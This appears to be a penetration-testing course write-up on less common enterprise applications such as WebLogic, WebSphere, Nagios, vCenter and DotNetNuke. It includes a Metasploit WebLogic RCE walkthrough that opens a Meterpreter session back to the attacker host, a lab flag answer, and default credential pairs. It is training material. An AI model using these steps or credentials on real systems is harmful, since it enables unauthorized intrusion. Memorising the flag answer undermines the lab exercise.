🎯 Objective: Reference guide for additional applications commonly encountered during penetration tests with their attack vectors and default credentials.
Beyond the main applications covered in this module, penetration testers encounter many other applications in enterprise environments. This reference covers common vulnerabilities, default credentials, and attack techniques for frequently seen applications.
Question: "Enumerate the target host and identify the running application. What application is running?"
# Standard enumeration
nmap -sV -sC target
# Expected: WebLogic server identificationQuestion: "Enumerate the application for vulnerabilities. Gain remote code execution and submit the contents of the flag.txt file on the administrator desktop."
# Launch Metasploit
msfconsole -q
# Use WebLogic RCE module
use multi/http/weblogic_admin_handle_rce
# Set target options
set RHOSTS STMIP
set SRVHOST PWNIP
set LHOST PWNIP
# Execute exploit
exploit
# In Meterpreter session:
cat C:/Users/Administrator/Desktop/flag.txtAnswer: w3b_l0gic_RCE!
- Description: Web services framework (often on Tomcat)
- Attack Vectors: Default admin credentials, AAR file upload
- Default Creds: Check vendor documentation
- Exploitation: Upload webshell via AAR service files
- Tools: Metasploit modules available
- Description: IBM Java EE application server
- Attack Vectors: Default credentials, WAR file deployment
- Default Creds:
system:manager - Exploitation: Deploy WAR files for RCE
- CVEs: Many deserialization vulnerabilities
- Description: Oracle Java EE application server
- Attack Vectors: Deserialization RCE, default credentials
- CVEs: 190+ reported vulnerabilities
- Exploitation: Unauthenticated RCE (2007-2021)
- Common Ports: 7001, 7002
- Description: Open-source network monitoring
- Attack Vectors: SQL injection, auth bypass, RCE via API
- Vulnerabilities: XSS, LDAP disclosure, command injection
- API Abuse: Remote command execution capabilities
- HTB Reference: Zipper box
- Description: System/network monitoring solution
- Attack Vectors: Multiple RCE, privilege escalation
- Default Creds:
nagiosadmin:PASSW0RD - Vulnerabilities: SQL injection, code injection, XSS
- CVEs: Wide variety over the years
- Description: Search and analytics engine
- Attack Vectors: Various CVEs, misconfigurations
- Common Issues: Open instances, data exposure
- HTB Reference: Haystack box
- Ports: 9200, 9300
- Description: VMware management platform
- Attack Vectors: Weak credentials, CVE exploits
- Notable CVEs:
- Apache Struts 2 RCE
- CVE-2021-22005 (OVA upload)
- Impact: Often runs as SYSTEM/domain admin
- Platforms: Windows and Linux appliances
- Description: Collaboration platforms, internal wikis
- Attack Vectors: Known CVEs, search functionality abuse
- Data Sources: Document repositories, credential discovery
- Common Finds: Valid credentials in documents
- Description: Open-source C# CMS
- Attack Vectors: Auth bypass, directory traversal
- Vulnerabilities: File upload bypass, arbitrary download
- Framework: .NET-based
# Identify application and version
nmap -sV -sC target
nikto -h http://target
whatweb target# Common default combinations
admin:admin
admin:password
system:manager
nagiosadmin:PASSW0RD# Search for known exploits
searchsploit application_name version
nmap --script vuln target- File upload capabilities
- Command execution features
- API endpoints for automation
- Administrative functions
- 🔍 Port scanning - Identify all running services
- 📊 Service enumeration - Version and configuration detection
- 🎯 Application mapping - Create comprehensive inventory
- 🔑 Default credentials testing
- 🐛 Known vulnerability exploitation
- ⚙️ Built-in functionality abuse
- 📁 File upload and deployment attacks
- 📄 Document repositories searching
- 🔐 Credential harvesting from files
- 🏗️ Infrastructure mapping via configs
- 🔗 Lateral movement opportunities
Common Attack Patterns:
- 🔓 Default credentials remain unchanged
- 📦 File upload functionality for shells
- 🔧 Built-in features for command execution
- 📊 API abuse for automation and RCE
High-Impact Targets:
- Monitoring systems (network visibility)
- Virtualization platforms (infrastructure control)
- Application servers (web application hosting)
- Document repositories (credential discovery)
Assessment Tips:
- 📋 Always check for default credentials first
- 🔍 Look for file upload functionality
- 📚 Search documentation for API endpoints
- 🎯 Focus on administrative interfaces
💡 Pro Tip: Many enterprises run hundreds of different applications - develop a systematic approach to quickly identify, fingerprint, and test each one. Often the most critical vulnerabilities are in lesser-known monitoring or management applications running with high privileges.